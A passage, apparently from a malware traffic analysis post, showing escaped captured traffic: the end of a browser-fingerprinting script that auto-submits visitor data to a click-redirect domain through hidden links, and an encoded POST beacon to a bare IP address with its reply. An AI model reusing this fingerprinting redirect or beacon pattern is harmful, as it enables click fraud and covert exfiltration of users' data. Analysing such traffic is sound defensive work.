a=d.getElementById("sw"),c=a.offsetWidth;a.style.display="none";a.style.top="100%";a.style.display="block";return 0==c-a.offsetWidth?\r\n\t1:0},v:function(){var a=navigator.userAgent;if(!a)return a;1024<a.length&&(a=a.substring(0,1024));return a},o:function(){return{rv:b.J,ss:b.g(b.u()),ws:b.g(b.A()),wp:b.I(b.w()),ce:b.D(),ck:b.c,cv:b.f,cs:b.B(),fr:b.G(),hc:b.a,fl:b.i(),jv:b.m(),sc:c.screen.colorDepth,hr:history.length,rf:b.s(),lo:b.l(),mb:b.b(),hb:b.F(),pl:navigator.platform,ua:b.v()}},submit:function(){var a=d.forms[0];a.j.value=b.h(b.o());a.submit()},H:function(){b.submit()}};c.hc=b.C;c.jsfload=b.H})(window,document);\r\n\r\n\t<\/script>\r\n\t<noscript><meta http-equiv="refresh" content='1;url=http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&f=&j='><\/noscript>\r\n\t<style type="text\/css">\r\n\t::-webkit-scrollbar { -webkit-appearance:none !important; }\r\n\t<\/style>\r\n\t<\/head>\r\n\t<body onload="window.jsfload();">\r\n\t<div id="sw" style="position:absolute; left:0px; width:100%; z-index:1;"><a href="http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&f=&j=" onclick="return window.hc();">HOME<\/a><\/div>\r\n\t<div id="main" style="position:absolute; top:0px; left:0px; z-index:2; background-color:white; width:100%; height:100%; overflow:hidden; text-align:center; line-height:2;">\r\n\t.<form action="http:\/\/xml.dsmedianet.com\/click2" method="get">\r\n\t..<a href="http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&f=&j=" onclick="return window.hc();"><\/a>\r\n\t..<input type="hidden" name="i" value="7FlxoTbpIdU_1">\r\n\t..<input type="hidden" name="f" value="">\r\n\t..<input type="hidden" name="j" id="j">\r\n\t..<noscript><center><a href="http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&f=&j=" style="color:white" onclick="return window.hc();"> <\/a><input type=submit value='Click to proceed to your destination'><\/center><\/noscript>\r\n\t..<div style="width:20px; height:10px; overflow:hidden;"> <a href="http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&f=&j=" style="" onclick="return window.hc();">Continue<\/a> <\/div>\r\n\t.<\/form>\r\n\t<\/div>\r\n\t<a href="http:\/\/xml.dsmedianet.com\/click2?i=7FlxoTbpIdU_1&f=&j=" style="margin-left:-500px" onclick="return window.hc();">submit<\/a>\r\n\t<\/body>\r\n\t<\/html>\r\n\t<\/pre>\n\r\n\tPOST \/ HTTP\/1.1\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n\tHost: 31.192.112.238\r\n\tContent-Length: 464\r\n\tCache-Control: no-cache\r\n\tCookie: RNLBSERVERID=ded1217\r\n\r\n\tcG1G2sI\/BJMuIZIOgQHbXNBCH4J7kzbM30pBJzvEm171CatQsv6vW0evAtLg59zgzURewgxOMXZs94UDJGq1a7lWJ6zWLkvfN+UI6OY2igCKnUX6EOm+L1YgOb0tA5Czz+k0Ca4tRYd6B3w2V3imGckK\/9gSEFxgDwDclvdwGolE\/isrZihMDaEIClh+Jzs+MDYaOoM8GT\/c5x7qFKB7Cy6DekTg+Ify7EYun3tBiGQLWm7zKHRKu+ydA0PypDwxFdoUWiLJX\/XKgP2XIECJ\/2bOfBoma\/5dBco3IQF0t4bmlIP3NE9CRBMlJ+kqQGT8ai1XXsc7FbNkbPLSI5jW6iip81HXPteCQhOe2waLK+6FPTbPKlEZBZwFoz6iYwuksYIcB\/+9suiqeRY3PkRakrO9siTaGcU7cwJEgYCjBuaiwUevIY2jL4zPw4M6NXsHGOtNIS233yqaCA==\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Fri, 06 Nov 2015 22:26:25 GMT\r\n\tServer: Apache\r\n\tLast-Modified: Tue, 19 Nov 2013 02:04:48 GMT\r\n\tETag: "3809a1-8-4eb7e16dd3cea"\r\n\tAccept-Ranges: bytes\r\n\tContent-Length: 8\r\n\tVary: Accept-Encoding\r\n\tConnection: close\r\n\tContent-Type: text\/html\r\n\tX-Pad: avoid browser bug\r\n\r\n\tded1217\r\n\t<\/pre>\n
\n===============================================<\/p>\n![\"exec1.exe](\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-5.png\")
<\/a><\/p>\n
\n===============================================<\/p>\n
\n===============================================<\/p>\n